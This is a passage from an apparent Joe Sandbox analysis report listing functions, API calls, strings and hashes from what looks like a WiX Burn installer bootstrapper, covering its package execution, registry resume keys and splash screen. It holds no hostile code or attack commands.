Opcode Fuzzy Hash: 9e5977ad098cc6cd9a115a168ee8f58e15402d776f8fe668aeb9dfa2927509c4
Instruction Fuzzy Hash: AAF1A2B1900B19EADB119FA48C45FAF7BA8EF04750F15812DFD15E7280D73DAE818BA1

Function 007ECC24 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 235synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,007ED34C,?,?,?), ref: 007ECC6A
GetLastError.KERNEL32(?,?,007ED34C,?,?,?), ref: 007ECC77
ReleaseMutex.KERNEL32(?), ref: 007ECEDF

Strings

NetFxChainer.cpp, xrefs: 007ECC46, 007ECC98, 007ECCFD, 007ECD6C, 007ECDBE, 007ECE06
Failed to memory map cabinet file: %ls, xrefs: 007ECDCB
%ls_mutex, xrefs: 007ECD18
%ls_send, xrefs: 007ECCA9
Failed to create event: %ls, xrefs: 007ECD0A
Failed to MapViewOfFile for %ls., xrefs: 007ECE13
failed to copy event name to shared memory structure., xrefs: 007ECE3D
failed to allocate memory for event name, xrefs: 007ECCBD
Failed to create mutex: %ls, xrefs: 007ECD79
Failed to allocate memory for NetFxChainer struct., xrefs: 007ECC50
failed to allocate memory for mutex name, xrefs: 007ECD2C

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: 6ccf318d855d280acc12771b45a1eb15e46a2d64378948342078d45733839b17
Instruction ID: cda4b65a805213225d53f23a4c8f67040deed45683fe4708f691a3e641505777
Opcode Fuzzy Hash: 6ccf318d855d280acc12771b45a1eb15e46a2d64378948342078d45733839b17
Instruction Fuzzy Hash: 5271FF76A41761BBD3129B6A8C49F9B7AA4FF08350F01812AFD18E7351D7389D508AE4

Function 007CE936 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON

Download Yara Rule

APIs

Part of subcall function 008031C7: VariantInit.OLEAUT32(?), ref: 008031DD
Part of subcall function 008031C7: SysAllocString.OLEAUT32(?), ref: 008031F9
Part of subcall function 008031C7: VariantClear.OLEAUT32(?), ref: 00803280
Part of subcall function 008031C7: SysFreeString.OLEAUT32(00000000), ref: 0080328B

CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0080CA64,?,?,Action,?,?,?,00000000,?), ref: 007CEA07
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 007CEA51

Strings

comres.dll, xrefs: 007CEA1A
Addon, xrefs: 007CEA8E
Invalid value for @Action: %ls, xrefs: 007CEB46
Patch, xrefs: 007CEAD1
Failed to get RelatedBundle element count., xrefs: 007CE98B
Failed to get @Id., xrefs: 007CEB56
RelatedBundle, xrefs: 007CE944
Detect, xrefs: 007CE9F8
Failed to get @Action., xrefs: 007CEB5D
Upgrade, xrefs: 007CEA44
Failed to resize Upgrade code array in registration, xrefs: 007CEB29
Failed to get RelatedBundle nodes, xrefs: 007CE966
Failed to get next RelatedBundle element., xrefs: 007CEB64
cabinet.dll, xrefs: 007CEAAE
version.dll, xrefs: 007CEA64
Action, xrefs: 007CE9C4
Failed to resize Detect code array in registration, xrefs: 007CEB22
Failed to resize Patch code array in registration, xrefs: 007CEB37
Failed to resize Addon code array in registration, xrefs: 007CEB30

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$CompareVariant$AllocClearFreeInit
String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
API String ID: 702752599-259800149
Opcode ID: eb46405abf46e4cb10f859cd226a9f76da50982b51e6b20793fdb4738c4db521
Instruction ID: 965c5706083ad2ad2cc5f87ada4208f6c247deb0d9205f31841b05e33871dfe2
Opcode Fuzzy Hash: eb46405abf46e4cb10f859cd226a9f76da50982b51e6b20793fdb4738c4db521
Instruction Fuzzy Hash: 87718175A45626BBCB108E94CC45FBEB7B8FF05720F20425CE922A76C1D738AE51DB90

Function 007C8E48 Relevance: 37.2, APIs: 8, Strings: 13, Instructions: 433COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,560080DB,00000001,?,007C9801,?,00000000,00000000), ref: 007C8E8D

Strings

Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 007C928D
Failed to set symbol value., xrefs: 007C8F35
Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 007C924D
NOT, xrefs: 007C91A7
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 007C92C8
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 007C90AF
-, xrefs: 007C8FF1
condition.cpp, xrefs: 007C8F5C, 007C9027, 007C909C, 007C90F9, 007C923A, 007C927A, 007C92B5
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 007C910C
AND, xrefs: 007C9187
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 007C8F6F
@, xrefs: 007C8E93
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 007C903A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: StringType
String ID: -$@$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-3640792234
Opcode ID: 74afbb077eed8b51c71ab533ae925c367c39069eee24e1c8951dc6406b644410
Instruction ID: e989c7dd3d4a48eab00c8f4fd495aedacafea766ba40471ba9dea34f263a10d2
Opcode Fuzzy Hash: 74afbb077eed8b51c71ab533ae925c367c39069eee24e1c8951dc6406b644410
Instruction Fuzzy Hash: 18E1AC72640245EBDBA18F94CC8DFBA7BA5FB05710F14408EEA059E2C5D7BDCA81DB90

Function 007D44E7 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 181fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,007D49FE,0080B4D8,?,feclient.dll,00000000,?,?), ref: 007D44FE
ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,007D49FE,0080B4D8,?,feclient.dll,00000000,?,?), ref: 007D451F
GetLastError.KERNEL32(?,007D49FE,0080B4D8,?,feclient.dll,00000000,?,?), ref: 007D4525
WriteFile.KERNEL32(feclient.dll,?,00000004,007D49FE,00000000,?,007D49FE,0080B4D8,?,feclient.dll,00000000,?,?), ref: 007D468E
GetLastError.KERNEL32(?,007D49FE,0080B4D8,?,feclient.dll,00000000,?,?), ref: 007D4698

Strings

msasn1.dll, xrefs: 007D4636
feclient.dll, xrefs: 007D44ED, 007D451D, 007D451E, 007D45B2, 007D4637, 007D468D
Verification secret from parent does not match., xrefs: 007D4621
pipe.cpp, xrefs: 007D4549, 007D4574, 007D45DD, 007D4615, 007D4662, 007D46BC, 007D46FC
Failed to inform parent process that child is running., xrefs: 007D46C6
Failed to read verification process id from parent pipe., xrefs: 007D466C
Verification process id from parent does not match., xrefs: 007D4708
Failed to read size of verification secret from parent pipe., xrefs: 007D4553
Failed to allocate buffer for verification secret., xrefs: 007D459C
Failed to read verification secret from parent pipe., xrefs: 007D45E7
Verification secret from parent is too big., xrefs: 007D4580

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$CurrentProcessReadWrite
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
API String ID: 3008747291-452622383
Opcode ID: db79f1dafc4f4d26f60138bf4d6bcc0fe9954a544d34caf13a29b31f063cadc3
Instruction ID: f2bda0950e0ef29b3d32a3cd2f19bbe9a7f3d6a6ceb92104522373f62e7c3088
Opcode Fuzzy Hash: db79f1dafc4f4d26f60138bf4d6bcc0fe9954a544d34caf13a29b31f063cadc3
Instruction Fuzzy Hash: 5D51C3B2A40315BBE7119AA49C85FAF76BCFF05B10F11412AFE16F7290D7388E4186E1

Function 007E25AF Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON

Download Yara Rule

Strings

Repairable, xrefs: 007E264F
none, xrefs: 007E26E9
InstallArguments, xrefs: 007E25E9
Failed to get @InstallArguments., xrefs: 007E25FA
Failed to get @Repairable., xrefs: 007E2668
RepairArguments, xrefs: 007E262D
Failed to get @RepairArguments., xrefs: 007E263E
Failed to get @UninstallArguments., xrefs: 007E261C
Failed to get @Protocol., xrefs: 007E2727
DetectCondition, xrefs: 007E25C7
Invalid protocol type: %ls, xrefs: 007E270F
burn, xrefs: 007E2693
Failed to parse exit codes., xrefs: 007E26BF
Protocol, xrefs: 007E2676
UninstallArguments, xrefs: 007E260B
Failed to get @DetectCondition., xrefs: 007E25D8
Failed to parse command lines., xrefs: 007E273B
netfx4, xrefs: 007E26C8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
API String ID: 760788290-1911311241
Opcode ID: c4f5fd8b91471e238cc5c3b3499004efcac514fb434a145e7cf2b89170742c9c
Instruction ID: 1e575f81dfa394970ee2362f2627be057f0849855872590bf785044860ef21f4
Opcode Fuzzy Hash: c4f5fd8b91471e238cc5c3b3499004efcac514fb434a145e7cf2b89170742c9c
Instruction Fuzzy Hash: 24412A72A876A576C7295165CC42FEAB65CFF18B30F200311F920F67D3C6ACAD419692

Function 007E1970 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 007E1A77
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 007E1A95

Strings

Failed to parse @Code value: %ls, xrefs: 007E1B50
Invalid exit code type: %ls, xrefs: 007E1B66
Code, xrefs: 007E1AE4
Failed to get @Type., xrefs: 007E1B76
Failed to get exit code node count., xrefs: 007E19C2
Type, xrefs: 007E1A4F
success, xrefs: 007E1A68
Failed to allocate memory for exit code structs., xrefs: 007E1A02
error, xrefs: 007E1A88
forceReboot, xrefs: 007E1AC2
exeuser.cpp, xrefs: 007E19F8
Failed to get next node., xrefs: 007E1B7D
scheduleReboot, xrefs: 007E1AA4
Failed to select exit code nodes., xrefs: 007E199D
ExitCode, xrefs: 007E197E
Failed to get @Code., xrefs: 007E1B57

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeuser.cpp$forceReboot$scheduleReboot$success
API String ID: 2664528157-1714101571
Opcode ID: 6838b7813837a560fb883fa034093c197fc3bf7620ff544435524b6b443cc406
Instruction ID: 0bf426ea0a3ab4af113e7b6e9881955eae023c43c07dc089344436ec4a899c78
Opcode Fuzzy Hash: 6838b7813837a560fb883fa034093c197fc3bf7620ff544435524b6b443cc406
Instruction Fuzzy Hash: 7261F671A02255BBCB109B55CC42EAEBBB9FF48720F608269F424EB3D1D7789E40D750

Function 007CF09D Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 180registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008039CD: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00803A1A

RegCloseKey.ADVAPI32(00000000,?,00020006,00020006,00000000,?,?,00000002,00000000,?,00000000,00000001,00000002), ref: 007CF2CB

Part of subcall function 00801344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,007CF11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00801359

Strings

Failed to delete resume command line value., xrefs: 007CF2A7
Failed to create run key., xrefs: 007CF1AA
Installed, xrefs: 007CF132
burn.runonce, xrefs: 007CF167
Failed to delete run key value., xrefs: 007CF25A
registration.cpp, xrefs: 007CF250, 007CF29D
"%ls" /%ls, xrefs: 007CF172
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 007CF0AE
Failed to write Resume value., xrefs: 007CF120
Failed to write Installed value., xrefs: 007CF143
Failed to write resume command line value., xrefs: 007CF1EA
Failed to format resume command line for RunOnce., xrefs: 007CF186
BundleResumeCommandLine, xrefs: 007CF1D5, 007CF267
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 007CF0FA
Failed to write run key value., xrefs: 007CF1C8
Resume, xrefs: 007CF10F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseValueVersion
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
API String ID: 2348918689-3140388177
Opcode ID: f168a919a100b760bd5c621fbc85aedbffe630af0d45d6b7649564fc3f4c40f4
Instruction ID: f241fa760faad986624bbed8bc2b3e263d613f79cbfa2c95d0c27bad27e4dab7
Opcode Fuzzy Hash: f168a919a100b760bd5c621fbc85aedbffe630af0d45d6b7649564fc3f4c40f4
Instruction Fuzzy Hash: F151C036A40629FBDF116AA4CC46FAE7BAAFF04710F01013DFE10F6291D77999909AC0

Function 00807FEC Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,000002C0), ref: 00808019
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 00808034
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 008080D7
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,00000018,0080B508,00000000), ref: 00808116
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 00808169
CompareStringW.KERNEL32(0000007F,00000000,0080B508,000000FF,true,000000FF), ref: 00808187
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 008081BF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 00808303

Strings

application, xrefs: 00808026
enclosure, xrefs: 008082F1
exclusive, xrefs: 0080815B
apuputil.cpp, xrefs: 00808226
upgrade, xrefs: 008080C9
type, xrefs: 0080805F
true, xrefs: 00808179
http://appsyndication.org/2006/appsyn, xrefs: 0080800C
version, xrefs: 00808108, 008081B1

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: 5702e39000ec35c2ddeb6bf70a49cd4392a00b57b33d83ef9e8ea80926ff289c
Instruction ID: 430fac9703d1d21e752c48c976d1e0f2bc10192fc2493da5f1d07d1831ad156b
Opcode Fuzzy Hash: 5702e39000ec35c2ddeb6bf70a49cd4392a00b57b33d83ef9e8ea80926ff289c
Instruction Fuzzy Hash: BDB19A72A44606EBDBA08F54CC81F5A77A6FB44730F254618F9B9EB2D1DB74E891CB00

Function 008076A1 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 210COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00807703
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 00807727
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 00807746
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 0080777D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 00807798
SysFreeString.OLEAUT32(00000000), ref: 008077C3
SysFreeString.OLEAUT32(00000000), ref: 00807842
SysFreeString.OLEAUT32(00000000), ref: 0080788E

Strings

comres.dll, xrefs: 00807750
length, xrefs: 00807739
msasn1.dll, xrefs: 0080787C
feclient.dll, xrefs: 00807734
msi.dll, xrefs: 0080782A
rel, xrefs: 008076F4
href, xrefs: 0080771A
version.dll, xrefs: 008077A7
type, xrefs: 0080778B
title, xrefs: 00807770

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$Compare$Free
String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
API String ID: 318886736-3944986760
Opcode ID: a02e74e35fc8ae722c0c61e80b0a1a1ee2d1f96307a9abaf3370009dc817854b
Instruction ID: c0e308dd091146f8b2e0ba79430aac84d53b29048cc66d948b5213a5eaabf68d
Opcode Fuzzy Hash: a02e74e35fc8ae722c0c61e80b0a1a1ee2d1f96307a9abaf3370009dc817854b
Instruction Fuzzy Hash: A8716F35D0412AFBDB55DB94CC84EAEBBB8FF04360F2042A4E925E62D0D731AE50DB90

Function 007DE177 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007DE05E: LoadBitmapW.USER32(?,00000001), ref: 007DE094
Part of subcall function 007DE05E: GetLastError.KERNEL32 ref: 007DE0A0

LoadCursorW.USER32(00000000,00007F00), ref: 007DE1D8
RegisterClassW.USER32(?), ref: 007DE1EC
GetLastError.KERNEL32 ref: 007DE1F7
UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 007DE2FC
DeleteObject.GDI32(00000000), ref: 007DE30B

Strings

WixBurnSplashScreen, xrefs: 007DE1E5, 007DE2F7
Failed to create window., xrefs: 007DE28E
Unexpected return value from message pump., xrefs: 007DE2E6
splashscreen.cpp, xrefs: 007DE21B, 007DE284
Failed to register window., xrefs: 007DE225
Failed to load splash screen., xrefs: 007DE1B0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
API String ID: 164797020-2188509422
Opcode ID: d565676edfb529d1d128118018e1419705c50b77539ad5d0ebf42feaf8e2d15f
Instruction ID: e0dcf695ec8a91a57e62628472d74eb8ac6522cb5b42b97755990cc491ae1dbc
Opcode Fuzzy Hash: d565676edfb529d1d128118018e1419705c50b77539ad5d0ebf42feaf8e2d15f
Instruction Fuzzy Hash: 5F418172A00619FFEB11ABE4DD49EAAB7BDFF04710F100126F915EA250D778AD108791

Function 007E9BB3 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 230threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,007EBA53,00000001), ref: 007E9C18
GetLastError.KERNEL32(?,007EBA53,00000001), ref: 007E9D88
GetExitCodeThread.KERNEL32(00000001,00000000,?,007EBA53,00000001), ref: 007E9DC8
GetLastError.KERNEL32(?,007EBA53,00000001), ref: 007E9DD2

Strings

Failed to execute EXE package., xrefs: 007E9C4F
Failed to execute compatible package action., xrefs: 007E9D45
Failed to execute package provider registration action., xrefs: 007E9CE9
Invalid execute action., xrefs: 007E9E23
Failed to get cache thread exit code., xrefs: 007E9E03
apply.cpp, xrefs: 007E9DAC, 007E9DF6
Failed to execute MSI package., xrefs: 007E9C78
Cache thread exited unexpectedly., xrefs: 007E9E14
Failed to execute dependency action., xrefs: 007E9D08
Failed to execute MSP package., xrefs: 007E9C9D
Failed to wait for cache check-point., xrefs: 007E9DB9
Failed to execute MSU package., xrefs: 007E9CCD
Failed to load compatible package on per-machine package., xrefs: 007E9D2E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: 311cc425ce545758a2d2c31b7c3224b31447130abae2c2da91c2296ed9d76f3e
Instruction ID: f6fdee84579f4694b772c3e5741467b474ec8e291d7a619880654b2c58bf4560
Opcode Fuzzy Hash: 311cc425ce545758a2d2c31b7c3224b31447130abae2c2da91c2296ed9d76f3e
Instruction Fuzzy Hash: 8D716E72A022A5FFDB15DB65CD45ABE77F8EF08710F204169BA15E7350D2389E019BA0

Function 007ECA34 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 173processCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(76228FB0,00000002,00000000), ref: 007ECA40

